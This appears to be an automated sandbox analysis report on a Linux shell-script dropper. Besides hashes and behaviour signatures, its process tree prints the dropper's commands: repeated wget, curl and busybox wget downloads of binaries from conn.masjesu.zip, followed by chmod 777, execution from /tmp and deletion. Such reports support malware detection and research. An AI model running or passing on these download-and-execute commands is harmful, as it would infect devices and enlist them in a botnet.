Analysis
-
max time kernel
86s -
max time network
88s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
28/10/2024, 02:32
Static task
static1
Behavioral task
behavioral1
Sample
53e50a079dd44b3fad308902f263fbdd8f2fbbbc630af95eb9af755dcb641870.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
53e50a079dd44b3fad308902f263fbdd8f2fbbbc630af95eb9af755dcb641870.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
53e50a079dd44b3fad308902f263fbdd8f2fbbbc630af95eb9af755dcb641870.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
53e50a079dd44b3fad308902f263fbdd8f2fbbbc630af95eb9af755dcb641870.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
53e50a079dd44b3fad308902f263fbdd8f2fbbbc630af95eb9af755dcb641870.sh
-
Size
10KB
-
MD5
993a3e2f46840103a33a0ca2fc91dfe7
-
SHA1
678e29df40375ee97c70526b0218055aed855419
-
SHA256
53e50a079dd44b3fad308902f263fbdd8f2fbbbc630af95eb9af755dcb641870
-
SHA512
0bac561038a79d408e79fa667d6a436f7a5dc10e34ab8cf42f4de8e94b30a60aa6239a43161fdbd33a93e41bb712493f51354ae68939b1648fdff8882868c307
-
SSDEEP
192:SrOVDDYRLNeA59BA77wizvDoVNRN8sDiWFvDoVNv8sDiWO9BA77W6GDDYR4Gh:SrOMNv9BA77TzvDoVNR/vDoVNO9BA77x
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 929 chmod 971 chmod 887 chmod 894 chmod 880 chmod 936 chmod 992 chmod 873 chmod 999 chmod 915 chmod 812 chmod 859 chmod 957 chmod 978 chmod 985 chmod 835 chmod 866 chmod 908 chmod 943 chmod 964 chmod 749 chmod 805 chmod 950 chmod 1006 chmod 901 chmod 922 chmod 739 chmod 779 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/BS0PYE6MP5BMUNKtVzS1PZ9YBMKEtGMdIP 740 BS0PYE6MP5BMUNKtVzS1PZ9YBMKEtGMdIP /tmp/V1dIoo9BdZNcAS3tVRcLhZBZZ6Zo80ejYb 751 V1dIoo9BdZNcAS3tVRcLhZBZZ6Zo80ejYb /tmp/TTJUTjc5fC0gDAWsP3yfmFTHeG5HQ5Xbwe 780 TTJUTjc5fC0gDAWsP3yfmFTHeG5HQ5Xbwe /tmp/1zZtuOaLXZCa1bED4gBqXV0WUOCb6R7TdS 806 1zZtuOaLXZCa1bED4gBqXV0WUOCb6R7TdS /tmp/sMDwSLvBqqgXtFWNXxGeFjIWVjdg50gFsa 813 sMDwSLvBqqgXtFWNXxGeFjIWVjdg50gFsa /tmp/W1OaQ6s6pG9M9YG949bkaZKY2eJ6VRUtNs 836 W1OaQ6s6pG9M9YG949bkaZKY2eJ6VRUtNs /tmp/RcvRs88N1rRUqekMtkekFouDiCTGre7UAB 860 RcvRs88N1rRUqekMtkekFouDiCTGre7UAB /tmp/59npLpiyuM8mc3BSYEXUaoUHyxeUFjoTTG 867 59npLpiyuM8mc3BSYEXUaoUHyxeUFjoTTG /tmp/097EdcnnUqnqqmugSy1vx485KV6h8MN6qb 874 097EdcnnUqnqqmugSy1vx485KV6h8MN6qb /tmp/tLFtQuf8Ud3HcHq77mhzoXXXJFiyc1Htl7 881 tLFtQuf8Ud3HcHq77mhzoXXXJFiyc1Htl7 /tmp/e8K8RoA2ws5xoQXlRo99769Ks4gfT09qQ0 888 e8K8RoA2ws5xoQXlRo99769Ks4gfT09qQ0 /tmp/ZYTUjiIOs1IDrzEwZK0AurLPsZFBlNU0iG 895 ZYTUjiIOs1IDrzEwZK0AurLPsZFBlNU0iG /tmp/sLM3lF5qBp1MBsDsB7eeI4hgepgvJ2snt1 902 sLM3lF5qBp1MBsDsB7eeI4hgepgvJ2snt1 /tmp/s0s832PoqRyXmJVHTT1SiGUY1Fh9kImBWT 909 s0s832PoqRyXmJVHTT1SiGUY1Fh9kImBWT /tmp/sLM3lF5qBp1MBsDsB7eeI4hgepgvJ2snt1 916 sLM3lF5qBp1MBsDsB7eeI4hgepgvJ2snt1 /tmp/s0s832PoqRyXmJVHTT1SiGUY1Fh9kImBWT 923 s0s832PoqRyXmJVHTT1SiGUY1Fh9kImBWT /tmp/e8K8RoA2ws5xoQXlRo99769Ks4gfT09qQ0 930 e8K8RoA2ws5xoQXlRo99769Ks4gfT09qQ0 /tmp/ZYTUjiIOs1IDrzEwZK0AurLPsZFBlNU0iG 937 ZYTUjiIOs1IDrzEwZK0AurLPsZFBlNU0iG /tmp/V1dIoo9BdZNcAS3tVRcLhZBZZ6Zo80ejYb 944 V1dIoo9BdZNcAS3tVRcLhZBZZ6Zo80ejYb /tmp/BS0PYE6MP5BMUNKtVzS1PZ9YBMKEtGMdIP 951 BS0PYE6MP5BMUNKtVzS1PZ9YBMKEtGMdIP /tmp/W1OaQ6s6pG9M9YG949bkaZKY2eJ6VRUtNs 958 W1OaQ6s6pG9M9YG949bkaZKY2eJ6VRUtNs /tmp/RcvRs88N1rRUqekMtkekFouDiCTGre7UAB 965 RcvRs88N1rRUqekMtkekFouDiCTGre7UAB /tmp/TTJUTjc5fC0gDAWsP3yfmFTHeG5HQ5Xbwe 972 TTJUTjc5fC0gDAWsP3yfmFTHeG5HQ5Xbwe /tmp/1zZtuOaLXZCa1bED4gBqXV0WUOCb6R7TdS 979 1zZtuOaLXZCa1bED4gBqXV0WUOCb6R7TdS /tmp/sMDwSLvBqqgXtFWNXxGeFjIWVjdg50gFsa 986 sMDwSLvBqqgXtFWNXxGeFjIWVjdg50gFsa /tmp/097EdcnnUqnqqmugSy1vx485KV6h8MN6qb 993 097EdcnnUqnqqmugSy1vx485KV6h8MN6qb /tmp/tLFtQuf8Ud3HcHq77mhzoXXXJFiyc1Htl7 1000 tLFtQuf8Ud3HcHq77mhzoXXXJFiyc1Htl7 /tmp/59npLpiyuM8mc3BSYEXUaoUHyxeUFjoTTG 1007 59npLpiyuM8mc3BSYEXUaoUHyxeUFjoTTG -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 740 BS0PYE6MP5BMUNKtVzS1PZ9YBMKEtGMdIP 891 curl 900 busybox 932 wget 982 curl 988 wget 727 curl 785 wget 858 busybox 897 wget 905 curl 919 curl 946 wget 975 curl 811 busybox 863 curl 879 busybox 911 wget 956 busybox 1002 wget 738 busybox 755 wget 933 curl 942 busybox 952 rm 995 wget 998 busybox 745 busybox 848 curl 904 wget 815 wget 877 curl 984 busybox 766 curl 809 curl 935 busybox 960 wget 963 busybox 970 busybox 711 wget 872 busybox 893 busybox 898 curl 907 busybox 951 BS0PYE6MP5BMUNKtVzS1PZ9YBMKEtGMdIP 954 curl 977 busybox 981 wget 816 curl 890 wget 912 curl 741 rm 862 wget 940 curl 961 curl 918 wget 996 curl 774 busybox 804 busybox 865 busybox 974 wget 742 wget 808 wget 949 busybox -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/V1dIoo9BdZNcAS3tVRcLhZBZZ6Zo80ejYb curl File opened for modification /tmp/e8K8RoA2ws5xoQXlRo99769Ks4gfT09qQ0 curl File opened for modification /tmp/ZYTUjiIOs1IDrzEwZK0AurLPsZFBlNU0iG curl File opened for modification /tmp/tLFtQuf8Ud3HcHq77mhzoXXXJFiyc1Htl7 curl File opened for modification /tmp/RcvRs88N1rRUqekMtkekFouDiCTGre7UAB curl File opened for modification /tmp/BS0PYE6MP5BMUNKtVzS1PZ9YBMKEtGMdIP curl File opened for modification /tmp/tLFtQuf8Ud3HcHq77mhzoXXXJFiyc1Htl7 curl File opened for modification /tmp/TTJUTjc5fC0gDAWsP3yfmFTHeG5HQ5Xbwe curl File opened for modification /tmp/sMDwSLvBqqgXtFWNXxGeFjIWVjdg50gFsa curl File opened for modification /tmp/s0s832PoqRyXmJVHTT1SiGUY1Fh9kImBWT curl File opened for modification /tmp/sLM3lF5qBp1MBsDsB7eeI4hgepgvJ2snt1 curl File opened for modification /tmp/s0s832PoqRyXmJVHTT1SiGUY1Fh9kImBWT curl File opened for modification /tmp/ZYTUjiIOs1IDrzEwZK0AurLPsZFBlNU0iG curl File opened for modification /tmp/59npLpiyuM8mc3BSYEXUaoUHyxeUFjoTTG curl File opened for modification /tmp/V1dIoo9BdZNcAS3tVRcLhZBZZ6Zo80ejYb curl File opened for modification /tmp/1zZtuOaLXZCa1bED4gBqXV0WUOCb6R7TdS curl File opened for modification /tmp/BS0PYE6MP5BMUNKtVzS1PZ9YBMKEtGMdIP curl File opened for modification /tmp/59npLpiyuM8mc3BSYEXUaoUHyxeUFjoTTG curl File opened for modification /tmp/097EdcnnUqnqqmugSy1vx485KV6h8MN6qb curl File opened for modification /tmp/sLM3lF5qBp1MBsDsB7eeI4hgepgvJ2snt1 curl File opened for modification /tmp/TTJUTjc5fC0gDAWsP3yfmFTHeG5HQ5Xbwe curl File opened for modification /tmp/sMDwSLvBqqgXtFWNXxGeFjIWVjdg50gFsa curl File opened for modification /tmp/097EdcnnUqnqqmugSy1vx485KV6h8MN6qb curl File opened for modification /tmp/1zZtuOaLXZCa1bED4gBqXV0WUOCb6R7TdS curl File opened for modification /tmp/W1OaQ6s6pG9M9YG949bkaZKY2eJ6VRUtNs curl File opened for modification /tmp/e8K8RoA2ws5xoQXlRo99769Ks4gfT09qQ0 curl File opened for modification /tmp/W1OaQ6s6pG9M9YG949bkaZKY2eJ6VRUtNs curl File opened for modification /tmp/RcvRs88N1rRUqekMtkekFouDiCTGre7UAB curl
Processes
-
/tmp/53e50a079dd44b3fad308902f263fbdd8f2fbbbc630af95eb9af755dcb641870.sh/tmp/53e50a079dd44b3fad308902f263fbdd8f2fbbbc630af95eb9af755dcb641870.sh1⤵PID:706
-
/bin/rm/bin/rm bins.sh2⤵PID:709
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/BS0PYE6MP5BMUNKtVzS1PZ9YBMKEtGMdIP2⤵
- System Network Configuration Discovery
PID:711
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/BS0PYE6MP5BMUNKtVzS1PZ9YBMKEtGMdIP2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:727
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/BS0PYE6MP5BMUNKtVzS1PZ9YBMKEtGMdIP2⤵
- System Network Configuration Discovery
PID:738
-
-
/bin/chmodchmod 777 BS0PYE6MP5BMUNKtVzS1PZ9YBMKEtGMdIP2⤵
- File and Directory Permissions Modification
PID:739
-
-
/tmp/BS0PYE6MP5BMUNKtVzS1PZ9YBMKEtGMdIP./BS0PYE6MP5BMUNKtVzS1PZ9YBMKEtGMdIP2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:740
-
-
/bin/rmrm BS0PYE6MP5BMUNKtVzS1PZ9YBMKEtGMdIP2⤵
- System Network Configuration Discovery
PID:741
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/V1dIoo9BdZNcAS3tVRcLhZBZZ6Zo80ejYb2⤵
- System Network Configuration Discovery
PID:742
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/V1dIoo9BdZNcAS3tVRcLhZBZZ6Zo80ejYb2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:743
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/V1dIoo9BdZNcAS3tVRcLhZBZZ6Zo80ejYb2⤵
- System Network Configuration Discovery
PID:745
-
-
/bin/chmodchmod 777 V1dIoo9BdZNcAS3tVRcLhZBZZ6Zo80ejYb2⤵
- File and Directory Permissions Modification
PID:749
-
-
/tmp/V1dIoo9BdZNcAS3tVRcLhZBZZ6Zo80ejYb./V1dIoo9BdZNcAS3tVRcLhZBZZ6Zo80ejYb2⤵
- Executes dropped EXE
PID:751
-
-
/bin/rmrm V1dIoo9BdZNcAS3tVRcLhZBZZ6Zo80ejYb2⤵PID:754
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TTJUTjc5fC0gDAWsP3yfmFTHeG5HQ5Xbwe2⤵
- System Network Configuration Discovery
PID:755
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TTJUTjc5fC0gDAWsP3yfmFTHeG5HQ5Xbwe2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:766
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TTJUTjc5fC0gDAWsP3yfmFTHeG5HQ5Xbwe2⤵
- System Network Configuration Discovery
PID:774
-
-
/bin/chmodchmod 777 TTJUTjc5fC0gDAWsP3yfmFTHeG5HQ5Xbwe2⤵
- File and Directory Permissions Modification
PID:779
-
-
/tmp/TTJUTjc5fC0gDAWsP3yfmFTHeG5HQ5Xbwe./TTJUTjc5fC0gDAWsP3yfmFTHeG5HQ5Xbwe2⤵
- Executes dropped EXE
PID:780
-
-
/bin/rmrm TTJUTjc5fC0gDAWsP3yfmFTHeG5HQ5Xbwe2⤵PID:783
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/1zZtuOaLXZCa1bED4gBqXV0WUOCb6R7TdS2⤵
- System Network Configuration Discovery
PID:785
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/1zZtuOaLXZCa1bED4gBqXV0WUOCb6R7TdS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:799
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/1zZtuOaLXZCa1bED4gBqXV0WUOCb6R7TdS2⤵
- System Network Configuration Discovery
PID:804
-
-
/bin/chmodchmod 777 1zZtuOaLXZCa1bED4gBqXV0WUOCb6R7TdS2⤵
- File and Directory Permissions Modification
PID:805
-
-
/tmp/1zZtuOaLXZCa1bED4gBqXV0WUOCb6R7TdS./1zZtuOaLXZCa1bED4gBqXV0WUOCb6R7TdS2⤵
- Executes dropped EXE
PID:806
-
-
/bin/rmrm 1zZtuOaLXZCa1bED4gBqXV0WUOCb6R7TdS2⤵PID:807
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/sMDwSLvBqqgXtFWNXxGeFjIWVjdg50gFsa2⤵
- System Network Configuration Discovery
PID:808
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/sMDwSLvBqqgXtFWNXxGeFjIWVjdg50gFsa2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:809
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/sMDwSLvBqqgXtFWNXxGeFjIWVjdg50gFsa2⤵
- System Network Configuration Discovery
PID:811
-
-
/bin/chmodchmod 777 sMDwSLvBqqgXtFWNXxGeFjIWVjdg50gFsa2⤵
- File and Directory Permissions Modification
PID:812
-
-
/tmp/sMDwSLvBqqgXtFWNXxGeFjIWVjdg50gFsa./sMDwSLvBqqgXtFWNXxGeFjIWVjdg50gFsa2⤵
- Executes dropped EXE
PID:813
-
-
/bin/rmrm sMDwSLvBqqgXtFWNXxGeFjIWVjdg50gFsa2⤵PID:814
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/W1OaQ6s6pG9M9YG949bkaZKY2eJ6VRUtNs2⤵
- System Network Configuration Discovery
PID:815
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/W1OaQ6s6pG9M9YG949bkaZKY2eJ6VRUtNs2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:816
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/W1OaQ6s6pG9M9YG949bkaZKY2eJ6VRUtNs2⤵PID:826
-
-
/bin/chmodchmod 777 W1OaQ6s6pG9M9YG949bkaZKY2eJ6VRUtNs2⤵
- File and Directory Permissions Modification
PID:835
-
-
/tmp/W1OaQ6s6pG9M9YG949bkaZKY2eJ6VRUtNs./W1OaQ6s6pG9M9YG949bkaZKY2eJ6VRUtNs2⤵
- Executes dropped EXE
PID:836
-
-
/bin/rmrm W1OaQ6s6pG9M9YG949bkaZKY2eJ6VRUtNs2⤵PID:839
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/RcvRs88N1rRUqekMtkekFouDiCTGre7UAB2⤵PID:840
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/RcvRs88N1rRUqekMtkekFouDiCTGre7UAB2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:848
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/RcvRs88N1rRUqekMtkekFouDiCTGre7UAB2⤵
- System Network Configuration Discovery
PID:858
-
-
/bin/chmodchmod 777 RcvRs88N1rRUqekMtkekFouDiCTGre7UAB2⤵
- File and Directory Permissions Modification
PID:859
-
-
/tmp/RcvRs88N1rRUqekMtkekFouDiCTGre7UAB./RcvRs88N1rRUqekMtkekFouDiCTGre7UAB2⤵
- Executes dropped EXE
PID:860
-
-
/bin/rmrm RcvRs88N1rRUqekMtkekFouDiCTGre7UAB2⤵PID:861
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/59npLpiyuM8mc3BSYEXUaoUHyxeUFjoTTG2⤵
- System Network Configuration Discovery
PID:862
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/59npLpiyuM8mc3BSYEXUaoUHyxeUFjoTTG2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:863
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/59npLpiyuM8mc3BSYEXUaoUHyxeUFjoTTG2⤵
- System Network Configuration Discovery
PID:865
-
-
/bin/chmodchmod 777 59npLpiyuM8mc3BSYEXUaoUHyxeUFjoTTG2⤵
- File and Directory Permissions Modification
PID:866
-
-
/tmp/59npLpiyuM8mc3BSYEXUaoUHyxeUFjoTTG./59npLpiyuM8mc3BSYEXUaoUHyxeUFjoTTG2⤵
- Executes dropped EXE
PID:867
-
-
/bin/rmrm 59npLpiyuM8mc3BSYEXUaoUHyxeUFjoTTG2⤵PID:868
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/097EdcnnUqnqqmugSy1vx485KV6h8MN6qb2⤵PID:869
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/097EdcnnUqnqqmugSy1vx485KV6h8MN6qb2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:870
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/097EdcnnUqnqqmugSy1vx485KV6h8MN6qb2⤵
- System Network Configuration Discovery
PID:872
-
-
/bin/chmodchmod 777 097EdcnnUqnqqmugSy1vx485KV6h8MN6qb2⤵
- File and Directory Permissions Modification
PID:873
-
-
/tmp/097EdcnnUqnqqmugSy1vx485KV6h8MN6qb./097EdcnnUqnqqmugSy1vx485KV6h8MN6qb2⤵
- Executes dropped EXE
PID:874
-
-
/bin/rmrm 097EdcnnUqnqqmugSy1vx485KV6h8MN6qb2⤵PID:875
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/tLFtQuf8Ud3HcHq77mhzoXXXJFiyc1Htl72⤵PID:876
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/tLFtQuf8Ud3HcHq77mhzoXXXJFiyc1Htl72⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:877
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/tLFtQuf8Ud3HcHq77mhzoXXXJFiyc1Htl72⤵
- System Network Configuration Discovery
PID:879
-
-
/bin/chmodchmod 777 tLFtQuf8Ud3HcHq77mhzoXXXJFiyc1Htl72⤵
- File and Directory Permissions Modification
PID:880
-
-
/tmp/tLFtQuf8Ud3HcHq77mhzoXXXJFiyc1Htl7./tLFtQuf8Ud3HcHq77mhzoXXXJFiyc1Htl72⤵
- Executes dropped EXE
PID:881
-
-
/bin/rmrm tLFtQuf8Ud3HcHq77mhzoXXXJFiyc1Htl72⤵PID:882
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/e8K8RoA2ws5xoQXlRo99769Ks4gfT09qQ02⤵PID:883
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/e8K8RoA2ws5xoQXlRo99769Ks4gfT09qQ02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:884
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/e8K8RoA2ws5xoQXlRo99769Ks4gfT09qQ02⤵PID:886
-
-
/bin/chmodchmod 777 e8K8RoA2ws5xoQXlRo99769Ks4gfT09qQ02⤵
- File and Directory Permissions Modification
PID:887
-
-
/tmp/e8K8RoA2ws5xoQXlRo99769Ks4gfT09qQ0./e8K8RoA2ws5xoQXlRo99769Ks4gfT09qQ02⤵
- Executes dropped EXE
PID:888
-
-
/bin/rmrm e8K8RoA2ws5xoQXlRo99769Ks4gfT09qQ02⤵PID:889
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ZYTUjiIOs1IDrzEwZK0AurLPsZFBlNU0iG2⤵
- System Network Configuration Discovery
PID:890
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ZYTUjiIOs1IDrzEwZK0AurLPsZFBlNU0iG2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:891
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ZYTUjiIOs1IDrzEwZK0AurLPsZFBlNU0iG2⤵
- System Network Configuration Discovery
PID:893
-
-
/bin/chmodchmod 777 ZYTUjiIOs1IDrzEwZK0AurLPsZFBlNU0iG2⤵
- File and Directory Permissions Modification
PID:894
-
-
/tmp/ZYTUjiIOs1IDrzEwZK0AurLPsZFBlNU0iG./ZYTUjiIOs1IDrzEwZK0AurLPsZFBlNU0iG2⤵
- Executes dropped EXE
PID:895
-
-
/bin/rmrm ZYTUjiIOs1IDrzEwZK0AurLPsZFBlNU0iG2⤵PID:896
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/sLM3lF5qBp1MBsDsB7eeI4hgepgvJ2snt12⤵
- System Network Configuration Discovery
PID:897
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/sLM3lF5qBp1MBsDsB7eeI4hgepgvJ2snt12⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:898
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/sLM3lF5qBp1MBsDsB7eeI4hgepgvJ2snt12⤵
- System Network Configuration Discovery
PID:900
-
-
/bin/chmodchmod 777 sLM3lF5qBp1MBsDsB7eeI4hgepgvJ2snt12⤵
- File and Directory Permissions Modification
PID:901
-
-
/tmp/sLM3lF5qBp1MBsDsB7eeI4hgepgvJ2snt1./sLM3lF5qBp1MBsDsB7eeI4hgepgvJ2snt12⤵
- Executes dropped EXE
PID:902
-
-
/bin/rmrm sLM3lF5qBp1MBsDsB7eeI4hgepgvJ2snt12⤵PID:903
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/s0s832PoqRyXmJVHTT1SiGUY1Fh9kImBWT2⤵
- System Network Configuration Discovery
PID:904
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/s0s832PoqRyXmJVHTT1SiGUY1Fh9kImBWT2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:905
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/s0s832PoqRyXmJVHTT1SiGUY1Fh9kImBWT2⤵
- System Network Configuration Discovery
PID:907
-
-
/bin/chmodchmod 777 s0s832PoqRyXmJVHTT1SiGUY1Fh9kImBWT2⤵
- File and Directory Permissions Modification
PID:908
-
-
/tmp/s0s832PoqRyXmJVHTT1SiGUY1Fh9kImBWT./s0s832PoqRyXmJVHTT1SiGUY1Fh9kImBWT2⤵
- Executes dropped EXE
PID:909
-
-
/bin/rmrm s0s832PoqRyXmJVHTT1SiGUY1Fh9kImBWT2⤵PID:910
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/sLM3lF5qBp1MBsDsB7eeI4hgepgvJ2snt12⤵
- System Network Configuration Discovery
PID:911
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/sLM3lF5qBp1MBsDsB7eeI4hgepgvJ2snt12⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:912
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/sLM3lF5qBp1MBsDsB7eeI4hgepgvJ2snt12⤵PID:914
-
-
/bin/chmodchmod 777 sLM3lF5qBp1MBsDsB7eeI4hgepgvJ2snt12⤵
- File and Directory Permissions Modification
PID:915
-
-
/tmp/sLM3lF5qBp1MBsDsB7eeI4hgepgvJ2snt1./sLM3lF5qBp1MBsDsB7eeI4hgepgvJ2snt12⤵
- Executes dropped EXE
PID:916
-
-
/bin/rmrm sLM3lF5qBp1MBsDsB7eeI4hgepgvJ2snt12⤵PID:917
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/s0s832PoqRyXmJVHTT1SiGUY1Fh9kImBWT2⤵
- System Network Configuration Discovery
PID:918
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/s0s832PoqRyXmJVHTT1SiGUY1Fh9kImBWT2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:919
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/s0s832PoqRyXmJVHTT1SiGUY1Fh9kImBWT2⤵PID:921
-
-
/bin/chmodchmod 777 s0s832PoqRyXmJVHTT1SiGUY1Fh9kImBWT2⤵
- File and Directory Permissions Modification
PID:922
-
-
/tmp/s0s832PoqRyXmJVHTT1SiGUY1Fh9kImBWT./s0s832PoqRyXmJVHTT1SiGUY1Fh9kImBWT2⤵
- Executes dropped EXE
PID:923
-
-
/bin/rmrm s0s832PoqRyXmJVHTT1SiGUY1Fh9kImBWT2⤵PID:924
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/e8K8RoA2ws5xoQXlRo99769Ks4gfT09qQ02⤵PID:925
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/e8K8RoA2ws5xoQXlRo99769Ks4gfT09qQ02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:926
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/e8K8RoA2ws5xoQXlRo99769Ks4gfT09qQ02⤵PID:928
-
-
/bin/chmodchmod 777 e8K8RoA2ws5xoQXlRo99769Ks4gfT09qQ02⤵
- File and Directory Permissions Modification
PID:929
-
-
/tmp/e8K8RoA2ws5xoQXlRo99769Ks4gfT09qQ0./e8K8RoA2ws5xoQXlRo99769Ks4gfT09qQ02⤵
- Executes dropped EXE
PID:930
-
-
/bin/rmrm e8K8RoA2ws5xoQXlRo99769Ks4gfT09qQ02⤵PID:931
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ZYTUjiIOs1IDrzEwZK0AurLPsZFBlNU0iG2⤵
- System Network Configuration Discovery
PID:932
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ZYTUjiIOs1IDrzEwZK0AurLPsZFBlNU0iG2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:933
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ZYTUjiIOs1IDrzEwZK0AurLPsZFBlNU0iG2⤵
- System Network Configuration Discovery
PID:935
-
-
/bin/chmodchmod 777 ZYTUjiIOs1IDrzEwZK0AurLPsZFBlNU0iG2⤵
- File and Directory Permissions Modification
PID:936
-
-
/tmp/ZYTUjiIOs1IDrzEwZK0AurLPsZFBlNU0iG./ZYTUjiIOs1IDrzEwZK0AurLPsZFBlNU0iG2⤵
- Executes dropped EXE
PID:937
-
-
/bin/rmrm ZYTUjiIOs1IDrzEwZK0AurLPsZFBlNU0iG2⤵PID:938
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/V1dIoo9BdZNcAS3tVRcLhZBZZ6Zo80ejYb2⤵PID:939
-
-
